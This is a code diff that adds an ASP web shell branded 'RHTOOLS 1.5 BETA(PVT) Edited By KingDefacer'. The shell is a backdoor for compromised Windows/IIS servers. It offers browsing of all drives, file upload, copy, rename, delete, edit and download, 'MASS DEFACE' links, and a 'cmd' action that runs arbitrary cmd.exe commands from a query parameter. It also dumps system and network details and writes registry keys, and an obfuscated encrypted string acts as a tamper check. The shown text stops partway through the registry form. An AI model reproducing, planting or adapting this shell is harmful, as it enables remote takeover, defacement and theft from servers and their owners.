+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		For nIndex = 1 to LenB(FileData)
+		    oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
+		Next
+		oFile.Close
+	End Sub
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
+startcode = "<html><head><title>RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer</title></head><body>"
+endocde = "</body></html>"
+onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
+Function DeCryptString(strCryptString)
+	Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
+	    strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
+	    intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
+	    intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
+	    strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
+	    arHexCharSet = Split(strHexCrypData, Hex(intKey))
+		 For i=0 to UBound(arHexCharSet)
+		      strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
+		 Next
+	    DeCryptString = CStr(strRAW)
+End Function
+Function HexConv(hexVar)
+	Dim hxx, hxx_var, multiply          
+         IF hexVar <> "" THEN
+              hexVar = UCASE(hexVar)
+              hexVar = StrReverse(hexVar)
+              DIM hx()
+              REDIM hx(LEN(hexVar))
+              hxx = 0
+              hxx_var = 0
+              FOR hxx = 1 TO LEN(hexVar)
+                   IF multiply = "" THEN multiply = 1
+                   hx(hxx) = mid(hexVar,hxx,1)
+                   hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
+                   multiply = (multiply * 16)
+              NEXT
+              hexVar = hxx_var
+              HexConv = hexVar
+         END IF
+End Function
+cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer &copy; BY <a href='mailto:kingdefacer@msn.com'>KingDefacer</a> - <a href='HTTP://WWW.alturks.com' target='_blank'>HTTP://WWW.alturks.com</a> ::.</font>"
+Function get_hxno(ghx)
+         If ghx = "A" Then
+              ghx = 10
+         ElseIf ghx = "B" Then
+              ghx = 11
+         ElseIf ghx = "C" Then
+              ghx = 12
+         ElseIf ghx = "D" Then
+              ghx = 13
+         ElseIf ghx = "E" Then
+              ghx = 14
+         ElseIf ghx = "F" Then
+              ghx = 15
+         End If
+         get_hxno = ghx
+End Function
+keydec = DeCryptString(key)
+Function showobj(objpath)
+	showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
+End Function
+Function showobjpath(objpath)
+	showobjpath = Left(objpath,InstrRev(objpath,"\"))
+End Function
+Function checking(a,b)
+	If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
+		pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
+		Response.Redirect(pagina)
+	End If
+End Function
+Sub hdr()
+	Response.Write startcode
+	Response.Write keydec
+	Response.Write "<br>"
+End Sub
+Sub showcontent()
+	Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>" 
+	If Trim(Request.QueryString("raiz")) = "root" Then
+		Set fs=Server.Createobject("Scripting.FileSystemObject")
+		Set drivecollection=fs.drives
+		Response.Write "<font face=""arial"" size=""2"">"
+		For Each drive IN drivecollection 
+			str=drive.driveletter & ":"
+			Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
+			Select Case drive.DriveType
+				Case 0
+					tipodrive = "Unknown"
+					nomedrive = drive.VolumeName
+				Case 1
+					tipodrive = "Removable"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 2
+					tipodrive = "Fixed"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 3
+					tipodrive = "Network"
+					If drive.isready Then
+						nomedrive = drive.ShareName
+					Else
+						nomedrive = ""
+					End If
+				Case 4
+					tipodrive = "CD-Rom"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 5
+					tipodrive = "RAM Disk"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+			End Select
+			response.write "<b>Tipo:</b> " & tipodrive & "<br>"
+			response.write "<b>Nome: </b>" & nomedrive & "<br>"
+			response.write "<b>Sistema de Arquivos: </b>"
+			If drive.isready Then
+				set sp=fs.getdrive(str)
+				response.write sp.filesystem & "<br>"
+			Else
+			response.write "-<br>"
+			End If
+			Response.Write "<b>Espaço Livre: </b>"
+			If drive.isready Then
+				freespace = (drive.AvailableSpace / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(freespace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<b>Espaço Total: </b>"
+			If drive.isready Then
+				totalspace = (drive.TotalSize / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(totalspace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<br>"
+		Next
+		Response.Write "</font>"
+		Set fs = Nothing
+		Set drivecollection = Nothing
+		set sp=Nothing
+	Else
+		If Trim(Request.QueryString("raiz")) = "" Then
+			caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+			pos = Instr(caminho,"\")
+			pos2 = 1
+			While pos2 <> 0
+				If Instr(pos + 1,caminho,"\") <> 0 Then
+					pos = Instr(pos + 1,caminho,"\")
+				Else
+					pos2 = 0
+				End If
+			Wend
+			raiz = Left(caminho,pos)
+		Else
+			raiz =  trim(Request.QueryString("raiz")) & "\"
+		End If
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MonRep = ObjFSO.GetFolder(raiz)
+		Set ColFolders = MonRep.SubFolders
+		Set ColFiles0 = MonRep.Files
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
+		Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
+		If CInt(Len(raiz) - 1) <> 2 Then
+			barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
+			backlevel = Left(raiz,barrapos)
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
+		Else
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
+		End If
+		Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		for each folderItem in ColFolders
+			Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
+		next
+		Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		marcatabela = true
+		for each FilesItem0 in ColFiles0
+			If marcatabela = true then
+				corfundotabela = " bgcolor=""#EEEEEE"""
+			Else
+				corfundotabela = ""
+			End If
+			Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
+			marcatabela = NOT marcatabela
+		next
+		Response.Write "</table>"
+	End If
+End Sub
+Select Case Trim(Request.QueryString("action"))
+	Case "get"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+		MyFile.Copy (destino)
+		If Err.Number = 0 Then
+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
+		End If	
+	Case "put"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("arquivo")) = "" Then
+			caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			varpath = Trim(Request.QueryString("path"))
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MonRep = ObjFSO.GetFolder(caminho)
+			Set ColFolders = MonRep.SubFolders
+			Set ColFiles0 = MonRep.Files
+
+			Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+			for each FilesItem0 in ColFiles0
+				Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
+			next
+			Response.Write "</table>"
+		Else
+			destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
+			arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(arquivo)
+			MyFile.Copy (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
+			End If
+		End If
+	Case "del"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		MyFile.Delete
+		If Err.Number = 0 Then
+			Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
+		End If
+	Case "ren"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("status")) <> "2" Then
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			arquivo = showobj(caminho)
+			Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
+						       "<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
+						       "<input type=""hidden"" name=""action"" value=""ren"">" & _
+						       "<input type=""hidden"" name=""status"" value=""2"">" & _
+						       "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
+						       "Digite o novo nome: <input type=""text"" name=""newname"">" & _
+						       "&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
+						       "</form>"
+		Else
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(caminho)
+			destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
+			MyFile.Move (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
+				Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			End If	
+		End If
+	Case "error"
+		Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
+	Case "cmd"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
+		Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
+		Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
+		szCMD = Request.QueryString(".CMD") 
+		If (szCMD <> "") Then 
+			szTempFile = "c:\" & oFileSys.GetTempName( ) 
+			Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
+			Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
+		End If 
+		Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
+		If (IsObject(oFile)) Then 
+			On Error Resume Next 
+			Response.Write "<font face=""arial"">"
+			Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+			oFile.Close 
+			Call oFileSys.DeleteFile(szTempFile, True) 
+		End If 
+	Case "info"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshNetwork = Server.CreateObject("WScript.Network")
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Set WshEnv = WshShell.Environment("SYSTEM")
+		Response.Write "<br><font face=arial size=2>"
+		Response.Write "<b>IDENTIFICAÇÃO DE REDE:</b><br>"
+		Response.Write "<b>Usuário: </b>" & WshNetwork.UserName & "<br>"
+		Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
+		Response.Write "<b>Usuário do Domínio: </b>" & WshNetwork.UserDomain & "<br>"
+		Set Drives = WshNetwork.EnumNetworkDrives
+		For i = 0 to Drives.Count - 1
+			Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
+		Next
+		Response.Write "<br><b>FÍSICO:</b><br>"
+		Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
+		Response.Write "<b>Número de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
+		Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
+		Response.Write "<b>Nível do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
+		Response.Write "<b>Revisão do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
+		Response.Write "<br><b>LÓGICO:</b><br>"
+		Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
+		Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
+		Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
+		Response.Write "<b>Especificação do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
+		Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
+		Response.Write "<b>Executáveis: </b>" & WshEnv("PATHEXT") & "<br>"
+		Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
+		Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
+		Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
+		Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
+		Set Drives = Nothing
+		Set WshNetwork = Nothing
+		Set WshShell = Nothing
+		Set WshEnv = Nothing
+	Case "reg"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
+		Select Case Trim(Request.QueryString("regaction"))
+			Case "w"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Select Case Trim(Request.QueryString("type"))
+						Case "1"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
+						Case "2"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
+						Case "3"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
+						Case "4"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
+						Case "5"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
+					End Select
+					Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
+					Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				Else
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descrição </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> número </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor binário </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expandível (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
+					Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
+					Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
+					Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
+					Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
